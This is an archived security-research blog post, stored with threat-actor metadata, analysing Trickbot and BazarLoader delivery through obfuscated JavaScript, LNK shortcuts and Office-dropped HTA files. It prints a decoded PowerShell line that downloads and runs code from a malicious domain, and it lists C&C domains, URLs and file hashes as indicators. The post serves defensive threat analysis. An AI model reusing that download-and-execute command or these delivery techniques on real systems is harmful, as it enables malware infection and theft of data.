{ "id": "70e54efc-77a8-4fc7-9cf7-0bf3196b73e4", "created_at": "2026-04-06T00:09:33.710849Z", "updated_at": "2026-04-10T03:37:23.890181Z", "deleted_at": null, "sha1_hash": "25a48aefef43cf459b65e2652cb46b9b53ca9c1c", "title": "New Trickbot and BazarLoader delivery vectors", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2207986, "plain_text": "New Trickbot and BazarLoader delivery vectors\r\nBy Tarun Dewan, Lenart Brave\r\nPublished: 2021-10-08 · Archived: 2026-04-05 19:27:49 UTC\r\nThe  Zscaler ThreatLabz research team monitors thousands of files daily tracking new and pervasive threats, including one\r\nof the most prominent banking trojans of the last five years: Trickbot. Trickbot has been active since 2016 and is linked to a\r\nlarge number of malicious campaigns involving bitcoin mining and theft of banking information, personal identifying\r\ninformation (PII), and credentials. BazarLoader is a spinoff of this trojan, developed by the same authors. Both are\r\nparticularly dangerous as they are easily modifiable and capable of delivering multi-stage payloads, as well as taking over\r\ncomputers entirely.\r\nThreatLabz has discovered Trickbot operators using new approaches to delivering payloads in recent attack campaigns. The\r\nmalware samples we analyzed were well-crafted and highly obfuscated with sandbox-evading capabilities. In this blog post,\r\nwe will show analysis of the different delivery vectors used by Trickbot and BazarLoader.\r\nKey Points:\r\n1. Script and LNK files added evasion techniques to leverage Malware threats.\r\n2. Multilayer obfuscation is used to preclude analysis of JS and LNK files.\r\n3. An Office attachment drops an HTA file with snippets of HTML and javascript functions.\r\n4. Newly registered domains are used to deliver threats.\r\nTrickbot is expanding its range of file types for malware delivery\r\nIn previous campaigns, Trickbot payloads were generally dropped as malicious attachments to Microsoft Office files. In the\r\nlast month, we’ve seen that malware has also used javascript files at a high volume, along with a range of other file formats,\r\nas shown in the following charts:\r\n \r\nFig1:Trickbot blocked in the Zscaler Cloud Sandbox\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 1 of 9\n\nFig2:BazarLoader blocked in the Zscaler Cloud Sandbox\r\nIn this blog, we’ll walk through the attack chain for multiple delivery vectors, including: \r\nTrickbot spreading through scripting files\r\nTrickbot spreading through LNK files\r\nBazarLoader spreading through Office attachments\r\nTrickbot spreading through scripting files\r\nTrickbot gains intrusion using spam emails bundled with malicious javascript attachments, such as the following:  \r\nFig3:Spam email attachment\r\nIn this case, the Javascript [5B606A5495A55F2BD8559778A620F21B] file has three layers of obfuscation that are mostly\r\nused to evade and bypass sandbox environments. Below is the snapshot of the first obfuscated layer:\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 2 of 9\n\nFig4:First layer of obfuscation in javascript\r\nIn addition to taking extreme effort to make javascript files highly obfuscated, the malware authors have also added large\r\namounts of junk code to the end to make debugging more difficult. The junk code is just random generated obfuscated\r\nstrings that do not play any role with the malicious code.\r\nFig5:Junk code to make analysis difficult\r\nUsing the eval() function we have de-obfuscated the second layer in which malicious code is embedded with more junk\r\ncode. After removing this layer of junk code, the eval() function is used once again to retrieve the final layer of code. We can\r\nsee that the Trickbot authors used the setTimeout() method, which evaluates an expression after a 967 milliseconds to delay\r\nexecution in the sandbox. This helps the malware evade sandbox environments.\r\nFig6: Second layer of obfuscation in javascript\r\nIn the above snapshot we are able to see the replace method implemented in the code where “\"hdBDJ\" and “tSJVh”\r\nstrings are removed from the variables “YHPhEFtKjqbCmAZ” and “kVYJOrLSqvdAWnaGTX” respectively to get the\r\nfinal string.\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 3 of 9\n\nFig7:Final layer\r\nThe malicious Javascript executes cmd.exe as a child process, then cmd.exe executes powershell.exe to download Trickbot\r\nas payload. \r\nFlow of execution: \r\nWscript.exe -\u003ecmd.exe-\u003epowershell.exe\r\nPowershell.exe embedded with base64 encoded command and after decoded following command is:\r\nIEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php\")\r\nFig8:Zscaler Cloud Sandbox detection of Javascript Downloader\r\nTrickbot spreading through LNK files\r\nWindows LNK (LNK) extensions are usually seen by users as shortcuts, and we have frequently observed cybercriminals\r\nusing LNK files to download malicious files such as Trickbot. Trickbot hides the code in the argument section under the\r\nproperties section of the LNK file. The malware author added extra spaces in between the malicious code to attempt to make\r\nit more difficult for researchers to debug the code. We’ve seen this technique used previously in the Emotet campaign using\r\nmalicious Office attachments in 2018.\r\nFig9:Code embedded in the properties section of LNK\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 4 of 9\n\nDownloading Trickbot :\r\n1. LNK downloads the file from 45.148.121.227/images/readytunes.png using a silent argument so that the user is not\r\nable to see any error message or progress action.\r\n2. After downloading, the malware saves the file to the Temp folder with the name application1_form.pdf.\r\n3. Finally, the file is renamed from application1_form.pdf to support.exe and executed. Here, support.exe is Trickbot.\r\nFig10:Zscaler Cloud Sandbox detection of LNK Downloader\r\nBazarLoader spreading through Office attachments\r\nThis is one of the other techniques used in TA551 APT aka Shathak. Malicious office documents drop the HTA file to\r\n“C\\ProgramData\\sda.HTA”. This HTA file contains HTML and vbscript designed to retrieve a malicious DLL to infect a\r\nvulnerable Windows host with BazarLoader. \r\nOnce macro-enabled, the mshta.exe process executes to download a payload. This campaign has been observed delivering\r\nBazarLoader and Trickbot in the past.\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 5 of 9\n\nFig11:Attack chain of DOC file to download BazarLoader\r\nBase64 encoded data is implemented in the HTML\r\ntag which is used later with javascript.\r\nFig12:Dropped HTA file : Malicious base64 encoded under HTML\r\nsection\r\nBelow is the snapshot of decode base64 data in which we can see it downloading the payload and saving as\r\nfriendIFriend,jpg to the victim machine:\r\nFig13:Dropped HTA file : Decode Base64 data\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 6 of 9\n\nNetworking : C\u0026C to download BazarLoader\r\nFig14:Sending request to download BazarLoader\r\nWe have also observed newly registered domains (NRDs) specifically created to distribute these payloads, using a stealer\r\ndelivered through spam email and bundled with a malicious Microsoft Office attachment.\r\nFig15: Newly registered domain\r\nFig16:Zscaler Cloud Sandbox detection of Malicious Office file Downloader\r\nJS.Downloader.Trickbot\r\nWin32.Backdoor.BazarLoader\r\nVBA.Downloader.BazarLoader\r\nMITRE ATT\u0026CK\r\nT5190 Gather Victim Network Information\r\nT1189 Drive-by Compromise\r\nT1082 System Information Discovery\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1564 Hide Artifacts\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 7 of 9\n\nT1027 Obfuscated Files or Information\r\nIndicators of Compromise\r\nMd5 Filename FileType\r\nB79AA1E30CD460B573114793CABDAFEB 100.js JS\r\nAB0BC0DDAB99FD245C8808D2984541FB 4821.js JS\r\n192D054C18EB592E85EBF6DE4334FA4D 4014.js JS\r\n21064644ED167754CF3B0C853C056F54 7776.js JS\r\n3B71E166590CD12D6254F7F8BB497F5A 7770.js JS\r\n5B606A5495A55F2BD8559778A620F21B 68.js JS\r\nBA89D7FC5C4A30868EA060D526DBCF56 Subcontractor Reviews (Sep 2021).lnk LNK\r\nMd5 Filename\r\nC7298C4B0AF3279942B2FF630999E746 a087650f65f087341d07ea07aa89531624ad8c1671bc17751d3986e503bfb76.bin.sample.gz\r\n3F06A786F1D4EA3402A3A23E61279931 -\r\nAssociated URLs:\r\njolantagraban.pl/log/57843441668980/dll/assistant.php\r\nblomsterhuset-villaflora.dk/assistant.php\r\nd15k2d11r6t6rl.cloudfront.net/public/users/beefree\r\nC\u0026C:\r\nDomain Payload\r\njolantagraban.pl Trickbot\r\nglareestradad.com BazarLoader\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 8 of 9\n\nfrancopublicg.com BazarLoader\r\nExplore more Zscaler blogs\r\nSource: https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nhttps://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors" ], "report_names": [ "new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors" ], "threat_actors": [ { "id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f", "created_at": "2022-10-25T15:50:23.579601Z", "updated_at": "2026-04-10T02:00:05.360509Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "TA551", "GOLD CABIN", "Shathak" ], "source_name": "MITRE:TA551", "tools": [ "QakBot", "IcedID", "Valak", "Ursnif" ], "source_id": "MITRE", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "40b623c7-b621-48db-b55b-dd4f6746fbc6", "created_at": "2024-06-19T02:03:08.017681Z", "updated_at": "2026-04-10T02:00:03.665818Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shathak", "TA551 " ], "source_name": "Secureworks:GOLD CABIN", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "90f216f2-4897-46fc-bb76-3acae9d112ca", "created_at": "2023-01-06T13:46:39.248936Z", "updated_at": "2026-04-10T02:00:03.260122Z", "deleted_at": null, "main_name": "GOLD CABIN", "aliases": [ "Shakthak", "TA551", "ATK236", "G0127", "Monster Libra" ], "source_name": "MISPGALAXY:GOLD CABIN", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68", "created_at": "2022-10-25T16:07:24.578896Z", "updated_at": "2026-04-10T02:00:05.039955Z", "deleted_at": null, "main_name": "TA551", "aliases": [ "G0127", "Gold Cabin", "Monster Libra", "Shathak", "TA551" ], "source_name": "ETDA:TA551", "tools": [ "BokBot", "CRM", "Gozi", "Gozi CRM", "IceID", "IcedID", "Papras", "Snifula", "Ursnif", "Valak", "Valek" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434173, "ts_updated_at": 1775792243, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/25a48aefef43cf459b65e2652cb46b9b53ca9c1c.pdf", "text": "https://archive.orkl.eu/25a48aefef43cf459b65e2652cb46b9b53ca9c1c.txt", "img": "https://archive.orkl.eu/25a48aefef43cf459b65e2652cb46b9b53ca9c1c.jpg" } }